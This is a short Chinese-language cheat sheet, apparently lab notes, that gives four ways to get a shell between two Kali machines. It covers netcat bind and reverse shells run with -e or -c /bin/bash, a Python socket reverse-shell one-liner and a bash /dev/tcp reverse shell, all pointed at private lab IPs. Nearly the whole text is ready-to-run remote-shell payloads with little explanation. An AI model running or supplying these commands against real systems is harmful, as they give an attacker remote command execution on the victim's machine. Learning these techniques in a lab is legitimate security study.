第一种:
NC(反向)连接:受控端先启动好监听(最新版本Kali)→控制端主动连接(老版本Kali)
nc -lvp 9999 //开启监听
nc 192.168.158.133 9999 -c /bin/bash //控制端主动连接
第二种:
NC(正向)连接:受控端先启动好监听(老版本Kali)→控制端主动连接(最新版本Kali)
nc -lvp 6666 -e /bin/bash //受控端开启监听
nc 192.168.158.131 6666 //连接受控端注意(IP是受控端)
第三种:
NC-python连接:控制端主动开启监听(最新版本Kali)→受控端(老版本Kali)利用python环境+python-payload反弹shell给控制端
nc lvp 6666 //控制端开启监听
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.153.139",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' //利用python构造payload(python启动方式不一样的可以删掉python2的二)
第四种:
NC(bash)连接:控制端主动开启监听(最新版本Kali)→受控端(老版本Kali)利用bash反弹shell给控制端
nc lvp 6666 //控制端开启监听
bash -i >& /dev/tcp/192.168.153.139/6666 0>&1 //受控端利用bash反弹shell给控制端
